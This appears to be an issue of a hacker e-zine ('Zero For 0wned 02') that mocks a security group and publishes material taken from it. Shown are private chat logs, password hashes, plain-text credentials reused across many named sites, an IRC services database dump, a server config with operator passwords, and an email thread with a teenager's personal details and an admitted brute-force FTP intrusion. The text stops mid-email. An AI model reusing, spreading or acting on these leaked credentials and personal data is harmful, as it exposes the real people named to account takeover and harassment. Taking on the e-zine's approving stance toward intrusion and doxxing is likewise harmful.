Copy Link
Add to Bookmark
Report
Zero For 0wned 02
### ## #####
######## ######## ####### ## # ##
######## ### ## ### ### ######## #### ## #### ## ## ## ## ## ### #### ##### ##
### ####### ####### ####### ## ######## ####### ## #### ## ## ####### ####### ####### ##
### ### ## ### # ### ### ####### ## ## ## ## ## #### ### ## ## ## ## ## ### ## ##
### ######## ## ## ## ####### ## ## ## ## #### ###### ## ## ######## ## ## ##
### ### ## ### ### ## ## ## ## ## ## ### #### ## ## ## ## ## ##
######## ####### ## ####### ## ######## ## ####### ### ## ## ## ######## ####### ##
######## #### ## ### ## #### ## ### ## ## ## ## ##### ### ## #######
sub TOC {
-[0x00]- Intro
-[0x01]- Enigma Group
-[0x02]- Critical Security
-[0x03]- Damn Small Linux
-[0x04]- Lordabot.c
-[0x05]- CF0
-[0x06]- Contact
}
sub Intro {
It's been a while since our last show, but no worries, we have not disappeared.
Rather, we are back with another issue of enjoyable entertainment.
If you find your name here, think no less of yourself, it could happen to anyone
(and just might). The best part about writing this issue was targeting those who
preach about security and swear by their own 'perfectly' secure servers. What's the
cause of you showing up in this issue? It's your own arrogance and stupidity that
put you here. Anyone can preach about security in theory, we've all seen that, but I
guess it's another thing to actually apply it. You probably ask yourself, "When?",
"Who?", "How?", well read on my and perhaps you'll find your answer, and perhaps you
will not. Who says we are nice people? Hah!
Enough with the talking and on with the show!
}
sub Engimagroup {
These are just some morons who think they'll all hard and leet.
They've even gone so far as to put "Enigmagroup: Learn from the best or be a
noob!" in thier website banner. With this claim of there's I decided to test
thier securtiy. After all, I shouldn't have been able to get anywhere, right?
First off we have some great AIM logs of the leader of Enigmagroup
psychomarine (his AIM nick is OSHIELDS2005), talking about how great they are:
[penguin]$ cat aim-log.txt
OSHIELDS2005: well trust me, anyone on this server, i guarentee you, can hold a
candle next to me, and my teams skills, so nothing will go down without them losing,
and they know it
OSHIELDS2005: cant* hold
OSHIELDS2005: besides, well be gone in like 2-3 days max
DOSshell2005: thats all fine and dandy, i just dont want a war started because i
decided to set this chan up u know
OSHIELDS2005: ha, war? between who?
OSHIELDS2005: ?
DOSshell2005: yall and hbh
OSHIELDS2005: ha we ARE at war
OSHIELDS2005: dont you notice they keep losing thier hosts?
OSHIELDS2005: ty ty, my fault
OSHIELDS2005: its amasing what a well drafted lawsuit letter will do to the hosts
OSHIELDS2005: next time they wont take credit for our missions
DOSshell2005: what fucking missions r u talking about
OSHIELDS2005: there was a time in the start of things, when we shared things, we
were allies
DOSshell2005: and wut happened after that
OSHIELDS2005: grindordie and mr cheese took our open source missions, from our staff
forum, and put them on thier site, first of all, almost all the basics, unless new
ones were recently added within the past 8 months, 3 reals, 2 steganos, 2
javascript, and the war games they have, which is why eg hasnt released our yet, so
we doint copy, or as it would seem
<snip>
Okay, enough of this, lets get to it.
[penguin]$ cat hashes.txt
psychomarine:0b6cdb94cde2c22fc9641edfc6900d2d:psychomarine@gmail.com
Paradox:e2bbea636dd5249ff9b5dbf7f47d7873:par4d0xx@gmail.com
Ausome1:41395976a900d273df5597fbd39f811c:Ausome1@gmail.com
(.....)
xXunstableXx:33fc78b83e31d9bbe9f9caf9647dde34:mjmahabir_99@hotmail.com
deceasedvitality:d5777ca9be97b0e7a9e23ef229464127:deceased_vitality@yahoo.com
ChopStuie:69bad7827e59fb4dfa7a8a47622ff821:chopstuie313@aim.com
Most of these people tend to reuse passwords:
[penguin]$ cat spider.txt
Phate
host: enigmagroup.org
username: phate
password: 171346
host: gmail.com
username: charade000@gmail.com
password: 171346
host: irc.2600.net
nick: phate
password: 171346
channel: #enigmagroup
host: zero.hastypastry.net
username: phate
password: 16772302
host: myspace.com
username: charade000@gmail.com
password: eg171346
host: hotafghans.com
username: phate
password: M4ia21
host: forums.us.dell.com
username: phate89
password: access
email: charade000@gmail.com
host: driversed.com
username: phate89
password: access
host: w4ck1ng.com
username: phate
password: access
host: hellboundhackers.org
username: phate89
password: access
host: yahoo.com
username: p1ng0fd3ath@yahoo.com
password: access
host: neworder.box.sk
username: phate89
password: access
host: hotmail.com
username: phate89@hotmail.com
passsword: access
host: N/A
username: phate2189
password: access
protocol: AIM
host: hotornot.com
username: phate2189
password: access
host:
username: 171346
password: 189147
HoboEuan
host: hotmail.co.uk
username: thecrashtestdummy@hotmail.co.uk
password: 1011011
host: dajoob.com
username: outrage@dajoob.com
password: Y48X6aCK
host: N/A
screename: HoboEuan
password: 1011011
protocol: AIM
host: www.hackits.de
username: HoboEuan
password: 1011011
host: aspect.bestweb.net
username: HoboEuan
password: 1011011
host: gmail.com
username: bleep1337@gmail.com
password: 1011011
host: trythis0ne.com
username: hoboeuan
password: 1011011
host: locus7s.com
username: HoboEuan
password: 1011011
host: forum.milw0rm.com
username: HoboEuan
password: 1011011
host: johnny.ihackstuff.com
username: hoboeuan
password: L3vlScmB
host: yahoo.com
username: bleep1337
password: 1011011
host: hellboundhackers.org
username: Man of Shadows
password: 1011011
host: enigmagroup.org
username: Hobo-Euan
password: 1011011
Name: Euan Meston
DJ_Double_D
host: gmail.com
username: big.drizzt@gmail.com
password: lab4551
host: www.hellboundhackers.org
username: DrizztDourden
password: lab4551
host: www.99-gtp.com
username: DrizztDourden
password: lab4551
host: www.spacialaudio.com
username: DJIcarus
password: lab4551
host: enigmagroup.org
username: DrizztDourden
password: lab4551
host: forums.us.dell.com
username: BigDrizzt
password: lab4551
email: big.drizzt@gmail.com
Name: Nicholas Doss
Phone number: 284-6157 (home), 953-7991
(Robert.Ivy.ctr@maxwell.af.mil)
Rippawallet
host: yahoo.com
username: kickflipkrazy
password: millie
host: hackthissite.org
username: rippawallet
password: millie
host: criticalsecurity.net
username: rippawallet
password: millie
TNH
host: enigmagroup.org
username: TNH
password: hellno
Capser
host: enigmagroup.org
username: casper
password: norte14
host: gmail.com
username: casperlok@gmail.com
password: norte14
username: capserlokzz@gmail.com
password: norte14
username: tls2006r@gmail.com
password: norte14
username: tls2007r@gmail.com
password: norte14
username: casperl2006@gmail.com
password: norte14
host: hackthissite.org
username: Casperlok
password: norte14
host: criticalsecurity.net
username: Capserlok
password: norte14
cybercryme
host: enigmagroup.org
username: cybercryme
password: 1066894
host: N/A
screename: cybercryme00
password: 1066894
protocol: AIM
Andropopolips
host: gmail.com
username: andropopolips@gmail.com
password: a09162
host: enigmagroup.org
username: Andropopolips
password: a09162
host: hellboundhackers.org
username: Andropopolips
password: a09162
host: www.osix.net
username: Andropopolips
password: a09162
host: forums.shyscyberchamber.com
username: Andropopolips
password: a09162
Ethernet
host: enigmagroup.org
username: Ethernet
password: abcdefg
G O Double D
host: enigmagroup.org
username: GODD
password: JH#s9jj2no
Thats just a small portion.
Hmm, how about IRC configs?
[penguin]$ strings nick.db
Andropopolips
a09162
andropopolips@gmail.com
!andropopol@*.dsl.connexus.net.au
ARMory
hackology
lion@Mail.lt
*MS@*.1E8EE2C0.494DA86A.IP
Ausome1
Ausome1sircpassword
Ausome1@gmail.com
*Ausome1@*.kntnny.adelphia.net
Butterfingers
pinkfloyd_bitches
fac3full@gmail.com
*operator@*.asm.bellsouth.net
Casper
norte14
casperlok@gmail.com
!*Casper@*.dsl.skt2ca.pacbell.net
Casper2
norte14
casperlok@gmail.com
!*Casper@*.dsl.skt2ca.pacbell.net
CerealBot
murder
c3re4l@gmail.com
#*Cereal@*.lsanca.dsl-w.verizon.net
cr4ck3rj4ck
enigmagroup187
darksidehacker@gmail.com
*icechat5@*.ipt.aol.com
c3re4l
murder
c3re4l@gmail.com
*Cereal@*.hsd1.mn.comcast.net
Cyborgasm
lolage
iamtheevil1@gmail.com
*Cyborgasm@*.ph.ph.cox.net
cybercryme
1066894
brandoneh@cox.net
*lackey@*.ok.ok.cox.net
DarkPixel
I\'"Z5R$|o#f}am
*subz@*.7FECBDA.5DAAA741.IP
DeathByte
1011011 thecrashtestdummy@hotmail.co.uk
#*HoboEuan@*.dynamic.dsl.as9105.com
Depsis
fragit
sdfsdF@sdfsdf.com
*wtf@*.foebud.org
DJ_Double_D
lab4551
big.drizzt@gmail.com
%*icechat5@*.dhcp.mtgm.al.charter.com
Ethernet
abcdefg
fuckoff@leetmail.com
*Ethernet@*.ed.shawcable.net
God
lolage
pie@aol.com
*lol@*.ph.ph.cox.net
GODD
JH#s9jj2no
spoogly@gmail.com
*GODD@*.suscom.net
Hybridtheory
1234567
royhp@optonline.net
HyBrIdThEo@*.dyn.optonline.net
idk
stealthispass
KOD_JUNK@yahoo.com
*KOD_JUNK@*.hot.res.rr.com
insurgence password
Junior_2k6@hotmail.co.uk
+*b0red@*.cable.ubr05.newy.blueyonder.co.uk
Jesus
lolage
pie@aol.com
*lol@*.ph.ph.cox.net
Lockdown
omghax
!*im_a_noob@*.hsd1.ca.comcast.net
Mals
solidkm
doc_shock_@hotmail.com
!*kraney@*.dynamic.dsl.as9105.com
JDarkcoder
@ 0i will own your bot ... one time ... i hope ...
Mumbie
Zhzovr
doc_shock_@hotmail.com
!*kraney@*.dynamic.dsl.as9105.com
Muffins
881170hb1n5AN17y
bhodgins@unixdevportal.com
*hacker@*.maine.res.rr.com
Omega
googoo
*none@*.port.east.verizon.net
operator
liekurgay~$C!&@Z&J73hhryhhyvnk
fac3full@gmail.com
*mctoasted@*.asm.bellsouth.net
Phocus
googleiscool
rakwater@hotmail.com
*T-Metal@*.dynamic.mts.net
Phate
171346
!*hacker@*.dsl.irvnca.pacbell.net
psychomarine
123456789
psychomarine@gmail.com
"psychomari@*.ACFE7E6C.BC31B162.IP
ratboy
loser
ratboy727@gmail.com
*ratboy@*.hsd1.wa.comcast.net
Rippawallet
millie
kickflipkrazy@yahoo.com
%*x@*.stb.ubr05.azte.blueyonder.co.uk
strayfe
el8qTrj9~
*strayfe@*.rochester.res.rr.com
Th3Postman
lab4551
big.drizzt@gmail.com
&big.drizzt@*.dhcp.mtgm.al.charter.com
ThatGuy
newcrappyircpass
roninhacker@gmail.com
"*uzeub@*.dhcp.dlth.mn.charter.com
T-Metal
googleiscool
rakwater@hotmail.com
*T-Metal@*.dynamic.mts.net
TNH
hellno
apyrogenius@gmail.com
*TNH@*.tampfl.dsl-w.verizon.net
uproot
chester
sdg@Gsdfg.com
*php@*.carnabyhosts.co.uk
xero ccvxzkbl
dwilliams91@gmail.com
*rawr@*.client.mchsi.com
Xendz
1021705
Locus7s5@gmail.com
!*Locus7s@*.rich.east.verizon.net
You
enigmagroup
doc_shock_@hotmail.com
!*kraney@*.dynamic.dsl.as9105.com
millie
kickflipkf@df.com
%*x@*.stb.ubr05.azte.blueyonder.co.uk
Andropopolips /andropopol@Enigma-1CB24894.dsl.connexus.net.au
Jack D
Andropopolips
ARMory !MS@ED402319.1E8EE2C0.494DA86A.IP
MS
Quit: Leaving D
K
ARMory
Ausome1 ,Ausome1@Enigma-11AE71C8.kntnny.adelphia.net
Ausome1
Quit: D
Ausome1
Butterfingers -Butterfing@Enigma-1074E6D4.asm.bellsouth.net Butters
Connection reset by peer D
<
Butterfingers
Casper .Casper@Enigma-CE9D6E74.dsl.skt2ca.pacbell.net
Casper
Ping timeout D
|
Casper
Casper2 .Casper@Enigma-14161806.dsl.skt2ca.pacbell.net
Casper
Ping timeout D
Casper2
CerealBot 0Cereal@Enigma-1A0D1846.lsanca.dsl-w.verizon.net
cereal jhavar D
-+
CerealBot
cr4ck3rj4ck
Enigma@Enigma-3E2064C0.info
cr4ck3rj4ck 4Quit: Chatzilla 0.9.75 [Firefox 1.5.0.6/2006072814] D
cr4ck3rj4ck
c3re4l 0Cereal@Enigma-1A0D1846.lsanca.dsl-w.verizon.net
cereal jhavar
Quit: Leaving D
c3re4l
cybercryme %lackey@Enigma-CACAC6C5.ok.ok.cox.net
BH
Quit: D
cybercryme
Cyborgasm (Cyborgasm@Enigma-21C501C8.ph.ph.cox.net
Cyborgasm
Quit: Leaving D
Cyborgasm
DarkPixel "subz@D0C2D8B4.7FECBDA.5DAAA741.IP
wIRC-client UQuit:
iRC
v7.0
download it
www.warIRC.com
DarkPixel
DeathByte 0HoboEuan@Enigma-DC69818D.dynamic.dsl.as9105.com HoboEuan
Ping timeout D
DeathByte
Depsis %Depsis@7EDAF9A7.1AA0C2DC.AD46CDF9.IP
Depsis
Quit: D
Depsis
DJ_Double_D 1icechat5@Enigma-8D6DA26.dhcp.mtgm.al.charter.com
The Power to Freeze
Connection reset by peer D
DJ_Double_D
Ethernet *Ethernet@Enigma-4906FF2E.ed.shawcable.net
Dave
Connection reset by peer D
Ethernet
God "lol@Enigma-1776DBDF.ph.ph.cox.net
CYborgasm D
God
GODD )GODD@Enigma-9CCAFD39.hsd1.pa.comcast.net
GODD 2Quit: Download Gaim: http://gaim.sourceforge.net/ D
V^
GODD
Hybridtheory -ATXM2D2GUA@Enigma-685D5AE3.dyn.optonline.net
ATXM2D2GUARD
Quit: Locus7s.com D
Z!
Hybridtheory
idk (KOD_JUNK@Enigma-76CD09BF.hot.res.rr.com
JT
Connection reset by peer D
c
idk
insurgence =insurgence@Enigma-A6BBF605.cable.ubr05.newy.blueyonder.co.uk
insurgence
Quit: Laters D
insurgence
Jesus "lol@Enigma-1776DBDF.ph.ph.cox.net
CYborgasm D
Jesus
Lockdown +lockdown@Enigma-89F092.hsd1.ca.comcast.net
Unknown
Ping timeout D
Lockdown
Mals 0Mulraney@Enigma-8BC28103.dynamic.dsl.as9105.com
Mals
Quit: Good Bye D
Mals
Muffins /icechat5@Enigma-45019A56.port.east.verizon.net
The Power to Freeze /NickServ (GHOST command used by Rippa{coding}) D
Muffins
Mumbie .kraney@Enigma-D3A7EA7F.dynamic.dsl.as9105.com
Kevin D
7H
Mumbie
Omega .im_a_noob@Enigma-5B855386.hsd1.nm.comcast.net
im_a_noob ?Quit: I am not worthy of this leet IRC, so im removing myself! D
Omega
operator *toasted@Enigma-5FF29657.asm.bellsouth.net
toasted
Quit: Leaving D
operator
Phate 4Charade000@Enigma-ED55A75A.dsl.irvnca.sbcglobal.net
Saeed
Quit: D
Phate
Phocus (T-Metal@Enigma-9333CFB6.dynamic.mts.net
Nobody D
Phocus
ratboy +ratboy@Enigma-438AE15C.hsd1.mn.comcast.net
t3h PHP guru
Ping timeout D
x}
ratboy
Rippawallet 2x@Enigma-5B7494CA.stb.ubr05.azte.blueyonder.co.uk
Ping timeout D
1
Rippawallet
strayfe &strayfe@Enigma-4E202443.dc.dc.cox.net
strayfe
Quit: sudo shutdown -h now D
strayfe
Th3Postman 3big.drizzt@Enigma-8D6DA26.dhcp.mtgm.al.charter.com
Drizzt BQuit: have to go to the hospital becasue i got rabies from ratboy D
Th3Postman
ThatGuy ,ThatGuy@Enigma-B3F507AA.hsd1.wa.comcast.net
ThatGuy
Quit: i have to go D
ThatGuy
T-Metal (T-Metal@Enigma-9333CFB6.dynamic.mts.net
Nobody
Quit: D
G
T-Metal
TNH 3ethernete@Enigma-94C66715.tampfl.dsl-w.verizon.net
TNH_
Quit: Done. D
TNH
uproot php@Enigma-3F0D1CD5.ipt.aol.com
php
Quit: Leaving D
uproot
Xendz ,Xendz@Enigma-BB8CDC32.rich.east.verizon.net
Xendz
Connection reset by peer D
<
Xendz
xero &rawr@Enigma-20D7385C.client.mchsi.com John Doe
Quit: 1m 4 1337 h4x0r, d00d! D
1
xero
You .kraney@Enigma-D3A7EA7F.dynamic.dsl.as9105.com
Kevin D
You
^ 2x@Enigma-5B7494CA.stb.ubr05.azte.blueyonder.co.uk
Quit: Leaving D
^
[penguin]$ cat unrealircd.conf
loadmodule "src/modules/commands.so";
loadmodule "src/modules/cloak.so";
include "help.conf";
include "badwords.channel.conf";
include "badwords.message.conf";
include "badwords.quit.conf";
include "spamfilter.conf";
me
{
name "irc.enigmagroup.org";
info "Enigma Group Security IRC";
numeric 1;
};
admin {
"Christopher O'Shields";
"psychomarine";
"psychomarine@gmail.com";
};
class clients
{
pingfreq 90;
maxclients 500;
sendq 100000;
recvq 8000;
};
class servers
{
pingfreq 90;
maxclients 10; /* Max servers we can have linked at a time */
sendq 1000000;
connfreq 100; /* How many seconds between each connection attempt
*/
};
allow {
ip *@*;
hostname *@*;
class clients;
maxperip 5;
};
/* Passworded allow line */
allow {
ip *@255.255.255.255;
hostname *@*.enigmagroup.org;
class clients;
password "muahahaha";
maxperip 1;
};
allow channel {
channel "#WarezSucks";
};
oper psychomarine {
class clients;
password "muahahaha";
flags
{
can_zline;
can_gkline;
global;
};
};
oper strayfe {
class clients;
password "kcz7:%@fz}$qI0D";
flags
{
netadmin;
can_zline;
can_gzline;
can_gkline;
services-admin;
can_override;
};
};
oper switch {
class clients;
password "noobs";
flags
{
netadmin;
can_addline;
can_override
can_restart;
get_umodew
can_zline;
can_gzline
can_gkline;
services-admin;
};
};
listen *:6697
{
options
{
clientsonly;
};
};
listen *:8067;
listen *:10000;
listen *:6667;
link services.enigmagroup.org
{
username *;
hostname 127.0.0.1;
bind-ip *;
port 10000;
hub *;
password-connect "muahahaha";
password-receive "muahahaha";
class servers;
options {
};
};
ulines {
services.enigmagroup.org;
};
drpass {
restart "restart-now";
die "die-noob";
};
log "ircd.log" {
/* Delete the log file and start a new one when it reaches 2MB, leave this
out to always use the
same log */
maxsize 2097152;
flags {
oper;
kline;
connects;
server-connects;
kills;
errors;
sadmin-commands;
chg-commands;
oper-override;
spamfilter;
};
};
alias NickServ { type services; };
alias ChanServ { type services; };
alias OperServ { type services; };
alias HelpServ { type services; };
alias StatServ { type stats; };
alias "identify" {
format "^#" {
target "chanserv";
type services;
parameters "IDENTIFY %1-";
};
format "^[^#]" {
target "nickserv";
type services;
parameters "IDENTIFY %1-";
};
type command;
};
alias "services" {
format "^#" {
target "chanserv";
type services;
parameters "%1-";
};
format "^[^#]" {
target "nickserv";
type services;
parameters "%1-";
};
type command;
};
alias "identify" {
format "^#" {
target "chanserv";
type services;
parameters "IDENTIFY %1-";
};
format "^[^#]" {
target "nickserv";
type services;
parameters "IDENTIFY %1-";
};
type command;
};
alias "glinebot" {
format ".+" {
command "gline";
type real;
parameters "%1 2d Bots are not allowed on this server, please read
the faq at http://www.example.com/faq/123";
};
type command;
};
ban nick {
mask "*C*h*a*n*S*e*r*v*";
reason "Reserved for Services";
};
ban ip {
mask 195.86.232.81;
reason "Delinked server";
};
ban server {
mask eris.berkeley.edu;
reason "Get out of here.";
};
ban user {
mask *tirc@*.saturn.bbn.com;
reason "Idiot";
};
ban realname {
mask "Swat Team";
reason "mIRKFORCE";
};
ban realname {
mask "sub7server";
reason "sub7";
};
except ban {
/* don't ban stskeeps */
mask *stskeeps@212.*;
};
deny dcc {
filename "*sub7*";
reason "Possible Sub7 Virus";
};
deny channel {
channel "*warez*";
reason "Warez is illegal";
};
vhost {
vhost i.hate.microsefrs.com;
from {
userhost *@*.image.dk;
};
login stskeeps;
password moo1cowsrulemyworld;
};
set {
network-name "EnigmaGroup";
default-server "irc.enigmagroup.org";
services-server "services.enigmagroup.org";
stats-server "stats.enigmagroup.org";
help-channel "#help";
hiddenhost-prefix "Enigma";
cloak-keys {
"aoAr1HnR6gl3sJ7hVz4Zcvnbmnb7x4YwpW";
"aoAr5yr1HnR6gl3sJ7hvbnVz4Zb7x4YwpW";
"aoAr1HnR6gl3frtghjsJ7vbmhVz4Zb7x4YwpW";
};
hosts {
local "locop.enigmagroup.org";
global "ircop.enigmagroup.org";
coadmin "coadmin.enigmagroup.org";
admin "admin.enigmagroup.org";
servicesadmin "csops.enigmagroup.org";
netadmin "netadmin.enigmagroup.org";
host-on-oper-up "no";
};
};
set {
kline-address "psychomarine@gmail.com";
modes-on-connect "+ixw";
modes-on-oper "+xw";
oper-auto-join "#opers";
dns {
nameserver 127.0.0.1;
timeout 2s;
retries 2;
};
options {
hide-ulines;
/* You can enable ident checking here if you want */
/* identd-check; */
show-connect-info;
};
maxchannelsperuser 10;
oper-only-stats "okfGsMRUEelLCXzdD";
/* Throttling: this example sets a limit of 3 connection attempts per 60s
(per host). */
throttle {
connections 3;
period 60s;
};
/* Anti flood protection */
anti-flood {
nick-flood 3:60; /* 3 nickchanges per 60 seconds (the
default) */
};
/* Spam filter */
spamfilter {
ban-time 1d; /* default duration of a *line ban set by spamfilter */
ban-reason "Spam/Advertising"; /* default reason */
virus-help-channel "#help"; /* channel to use for 'viruschan' action
*/
/* except "#help"; channel to exempt from filtering */
};
};
[penguin]$ cat services.conf
RemoteServer 127.0.0.1 10000 "muahahaha"
ServerName "services.enigmagroup.org"
ServerDesc "Services for EG Networks"
ServiceUser "services@enigmagroup.org"
NickServName "NickServ" "Nickname Server"
ChanServName "ChanServ" "Channel Server"
MemoServName "MemoServ" "Memo Server"
BotServName "BotServ" "Bot Server"
HelpServName "HelpServ" "Help Server"
OperServName "OperServ" "Operator Server"
GlobalName "Global" "Global Noticer"
HostServName "HostServ" "vHost Server"
PIDFile services.pid
MOTDFile services.motd
NickServDB nick.db
ChanServDB chan.db
BotServDB bot.db
OperServDB oper.db
NewsDB news.db
ExceptionDB exception.db
HostServDB hosts.db
HelpChannel "#help"
NetworkDomain "irc.enigmagroup.org"
NetworkName "EG IRC"
StrictPasswords
BadPassLimit 5
BadPassTimeout 1h
UpdateTimeout 5m
ExpireTimeout 30m
ReadTimeout 5s
WarningTimeout 4h
TimeoutCheck 3s
KeepLogs 7
KeepBackups 3
ForceForbidReason
UsePrivmsg
GlobalOnCycleMessage "Services are restarting, they will be back shortly - please be
good while we're gone"
GlobalOnCycleUP "Services are now back online - have a nice day"
ProxyThreads 5
ProxyMessage1 "I will now detect if you're using an insecure proxy."
ProxyMessage2 "If you see a connection on port 23, 1080, 3128 or 8080 from"
ProxyMessage3 "my.box.net, please disregard it, as it is the detector in action."
ProxyMessage4 "See http://proxy.myirc.net/ for information about our proxy policy."
ProxyCheckWingate
ProxyCheckSocks4
ProxyCheckSocks5
ProxyCheckHTTP1
ProxyCheckHTTP2
ProxyCheckHTTP3
ProxyTimeout 15s
ProxyTestServer "1.2.3.4" 6667
ProxyExpire 30d
ProxyCacheExpire 1d
ProxyAkillReason "You're using an insecure proxy."
WallProxy
ProxyMax 50
NSDefSecure
NSDefPrivate
NSDefHideEmail
NSDefHideUsermask
NSDefMemoSignon
NSDefMemoReceive
NSDefLanguage 1
NSRegDelay 30s
NSExpire 21d
NSMaxAliases 32
NSAccessMax 32
NSEnforcerUser enforcer@enigmagroup.org
NSReleaseTimeout 1m
NSListMax 50
NSGuestNickPrefix "n00b"
NSSecureAdmins
NSStrictPrivileges
NSRestrictGetPass
CSDefKeepTopic
CSDefPeace
CSDefSecure
CSDefSecureFounder
CSDefSignKick
CSDefXOP
CSMaxReg 20
CSExpire 14d
CSDefBantype 2
CSAccessMax 1024
CSAutokickMax 32
CSAutokickReason "User has been banned from the channel"
CSInhabit 15s
CSListMax 50
MSMaxMemos 20
MSSendDelay 3s
MSNotifyAll
BSDefGreet
BSDefFantasy
BSDefSymbiosis
BSMinUsers 1
BSBadWordsMax 32
BSKeepData 10m
BSGentleBWReason
ServicesRoot "psychomarine"
LogMaxUsers
AutoKillExpiry 30d
ChanKillExpiry 30d
SGLineExpiry 30d
SQLineExpiry 30d
SZLineExpiry 30d
KillClonesAkillExpire 30m
DisableRaw off
WallOSGlobal
WallOSMode
WallOSClearmodes
WallOSKick
WallOSAkill
WallOSSGLine
WallOSSQLine
WallOSSZLine
WallOSNoOp
WallOSJupe
WallOSRaw
WallGetpass
WallSetpass
WallForbid
WallDrop
LimitSessions
DefSessionLimit 3
MaxSessionLimit 100
ExceptionExpiry 1d
SessionLimitExceeded "The session limit for your host %s has been exceeded."
MaxSessionKill 15
SessionAutoKillExpiry 30m
AddAkiller
[penguin]$ cat phate.txt
Phate is a prominent member of Egnigmagroup. He's a forum moderator, as well as
an op in thier IRC channel.
We did some digging on him. Let's see what was turned up:
Phate
host: enigmagroup.org
username: phate
password: 171346
host: gmail.com
username: charade000@gmail.com
password: 171346
host: irc.2600.net
nick: phate
password: 171346
channel: #enigmagroup
host: zero.hastypastry.net
username: phate
password: 16772302
host: myspace.com
username: charade000@gmail.com
password: eg171346
host: hotafghans.com
username: phate
password: M4ia21
host: forums.us.dell.com
username: phate89
password: access
email: charade000@gmail.com
host: driversed.com
username: phate89
password: access
host: w4ck1ng.com
username: phate
password: access
host: hellboundhackers.org
username: phate89
password: access
host: yahoo.com
username: p1ng0fd3ath@yahoo.com
password: access
host: neworder.box.sk
username: phate89
password: access
host: hotmail.com
username: phate89@hotmail.com
passsword: access
host: N/A
username: phate2189
password: access
protocol: AIM
host: hotornot.com
username: phate2189
password: access
host:
username: 171346
password: 189147
He appears to be a fan of password re-use. How fun. :)
Phate also appears to be a bit of a whitehat:
[penguin]$ cat busted.txt
X-Gmail-Received: ee56309b55a2363dd20870515cf6e5754cbf73ce
Delivered-To: charade000@gmail.com
Received: by 10.70.63.17 with SMTP id l17cs90277wxa;
Wed, 9 Aug 2006 22:47:51 -0700 (PDT)
Received: by 10.35.77.1 with SMTP id e1mr3109061pyl;
Wed, 09 Aug 2006 22:47:51 -0700 (PDT)
Return-Path: <admin@milliondollarfreeload.com>
Received: from milliondollarfreeload.com (mail.alphared.com [38.113.128.17])
by mx.gmail.com with ESMTP id 38si1699269nzk.2006.08.09.22.47.51;
Wed, 09 Aug 2006 22:47:51 -0700 (PDT)
Received-SPF: neutral (gmail.com: 38.113.128.17 is neither permitted nor denied by
best guess record for domain of admin@milliondollarfreeload.com)
Date: Thu, 10 Aug 2006 00:47:47 -0500
Message-Id: <200608100047.AA427098378@milliondollarfreeload.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
From: "admin " <admin@milliondollarfreeload.com>
Reply-To: <admin@milliondollarfreeload.com>
To: <charade000@gmail.com>
Subject: Computer intrusion WARNING: www.milliondollarfreeload.com
X-Mailer: <IMail v8.05>
To Saeed,
This is our first and final warning in regards to your recent intrusion to our
website www.milliondollarfreeload.com. Our record indicates that you have hacked
into our server once and had over 300 attempts in hacking our email system. We
would like to inform you that hacking is a federal crime.
We ran a simple search of you and this is some of the information that turned out:
Male
16 years old
August 08, 1989
Corona, CALIFORNIA
United States
Santiago High School
Norco,California
As mentioned above, this is a final warning. If any type of these activities
continues, we will report you to the authority
(http://www.usdoj.gov/criminal/cybercrime/reporting.htm) and pursue for all of the
damages you may have caused. We ask you to kindly stop here because a criminal
record may hurt your future career.
--Admin
www.milliondollarfreeload.com
X-Gmail-Received: bc0d3fc0112e4ea4d0db1b7e59bec1b46e0674f5
Received: by 10.70.63.17 with HTTP; Thu, 10 Aug 2006 07:52:05 -0700 (PDT)
Message-ID: <42cb2150608100752x3d81712chc352904630af012c@mail.gmail.com>
Date: Thu, 10 Aug 2006 07:52:05 -0700
From: Charade <charade000@gmail.com>
To: admin@milliondollarfreeload.com
Subject: Re: Computer intrusion WARNING: www.milliondollarfreeload.com
In-Reply-To: <200608100047.AA427098378@milliondollarfreeload.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_39129_24992824.1155221525852"
References: <200608100047.AA427098378@milliondollarfreeload.com>
Delivered-To: charade000@gmail.com
------=_Part_39129_24992824.1155221525852
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Dear Tillie,
First of all i would like to make it clear that i never gained root to the
server, nor had 300 attempts to penetrate your email system, I gained access
through your FTP port which was vulnerable to Brutus because of the weak
password. And as for the search, Im not impressed, you have me on your
myspace and could have *easily* got the information from there, and i could
do the same.
I'd also like to inform you that when i did have root( in the FTP that
is), I had the oppurtunity to cause catastrophic damage, I could have easily
accessed the bank accounts of your members, and yours as well, You should be
thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the index.html
I wont pursue damage to hack your site, so you can be rest assured on
this. But, i am offering my services to assist you in securing your website,
because I can at the moment deface it again, through many other ways
including an SQL Injection.
in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.
Dont refuse.
On 8/9/06, admin <admin@milliondollarfreeload.com> wrote:
>
> To Saeed,
>
> This is our first and final warning in regards to your recent intrusion to
> our website www.milliondollarfreeload.com. Our record indicates that you
> have hacked into our server once and had over 300 attempts in hacking our
> email system. We would like to inform you that hacking is a federal crime.
>
> We ran a simple search of you and this is some of the information that
> turned out:
>
> Male
> 16 years old
> August 08, 1989
> Corona, CALIFORNIA
> United States
>
> Santiago High School
> Norco,California
>
> As mentioned above, this is a final warning. If any type of these
> activities continues, we will report you to the authority (
> http://www.usdoj.gov/criminal/cybercrime/reporting.htm) and pursue for all
> of the damages you may have caused. We ask you to kindly stop here because
> a criminal record may hurt your future career.
>
> --Admin
> www.milliondollarfreeload.com
>
>
------=_Part_39129_24992824.1155221525852
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Dear Tillie,<br><br>First of all i would like to make it clear that i never gained
root to the server, nor had 300 attempts to penetrate your email system, I gained
access through your FTP port which was vulnerable to Brutus because of the weak
password. And as for the search, Im not impressed, you have me on your myspace and
could have *easily* got the information from there, and i could do the same.
<br> <br><br> I'd also like to inform you that when i did have
root( in the FTP that is), I had the oppurtunity to cause catastrophic damage, I
could have easily accessed the bank accounts of your members, and yours as well, You
should be thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the
index.html<br><br> I wont pursue damage to hack your site, so you can be rest
assured on this. But, i am offering my services to assist you in securing your
website, because I can at the moment deface it again, through many other ways
including an SQL Injection.
<br><br> in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.<br><br>Dont
refuse.<br><br><br><br> <br> <br><br><div><span
class="gmail_quote">
On 8/9/06, <b class="gmail_sendername">admin</b> <<a
href="mailto:admin@milliondollarfreeload.com">admin@milliondollarfreeload.com</a>>
